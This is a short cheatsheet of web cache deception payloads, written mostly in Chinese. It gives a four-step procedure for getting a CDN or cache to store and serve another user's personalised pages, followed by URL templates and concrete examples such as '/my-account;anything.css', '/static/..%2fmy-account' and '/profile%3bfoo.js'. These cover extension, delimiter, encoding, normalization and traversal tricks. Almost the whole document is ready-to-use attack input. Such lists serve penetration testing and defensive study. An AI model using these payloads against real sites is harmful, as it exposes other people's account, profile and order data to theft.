Web Cache Deception Payload Cheatsheet

發表於 2026-02-02 | 更新於 2026-02-02 | WCD caching CDN Web Security cheatsheet

How to use

1. 選一個會回個人化/敏感資料的動態端點：<TARGET>
2. 套用下列 payload 產生「變形 URL」
3. 同一變形 URL 連送兩次：第二次要出現 hit / Age 變大 / 明顯變快
4. 驗證重點：同一變形 URL 取回的是「別人的個人化內容」才算 WCD

Payload quick table

Static extension cache rules

• /<TARGET>/<JUNK>.css
• /<TARGET>/<JUNK>.js
• /<TARGET>/<JUNK>.png

• /my-account/anything.css
• /profile/test.js
• /orders/x.png

Path mapping discrepancies

• /<TARGET>/<JUNK>
• /<TARGET>/<JUNK>/<MORE>

• /my-account/aaa
• /profile/this/looks/static

Delimiter discrepancies

• /<TARGET>;<JUNK>.css
• /<TARGET>:<JUNK>.css
• /<TARGET>,<JUNK>.css

• /my-account;anything.css
• /profile,foo.js
• /orders:test.png

Delimiter decoding discrepancies

• /<TARGET>%23<JUNK>.css（%23 = #）
• /<TARGET>%3b<JUNK>.css（%3b = ;）
• /<TARGET>%3f<JUNK>.css（%3f = ?）

• /my-account%23anything.css
• /profile%3bfoo.js
• /orders%3ftest.png

Static directory cache rules

• /static/..%2f<TARGET>
• /assets/..%2f<TARGET>
• /images/..%2f<TARGET>

• /static/..%2fmy-account
• /assets/..%2fprofile
• /images/..%2forders

Normalization discrepancies

• /<A>/..%2f<TARGET>
• /<A>/%2e%2e%2f<TARGET>
• /<A>/%2e%2e%2f%2e%2e%2f<TARGET>

• /aaa/..%2fmy-account
• /x/%2e%2e%2fprofile
• /a/%2e%2e%2f%2e%2e%2forders

File name cache rules

• /<TARGET>/<FILENAME>.css
• /<TARGET>/<FILENAME>.map
• /<TARGET>/<FILENAME>.ico

• /my-account/app.css
• /profile/main.js.map
• /orders/favicon.ico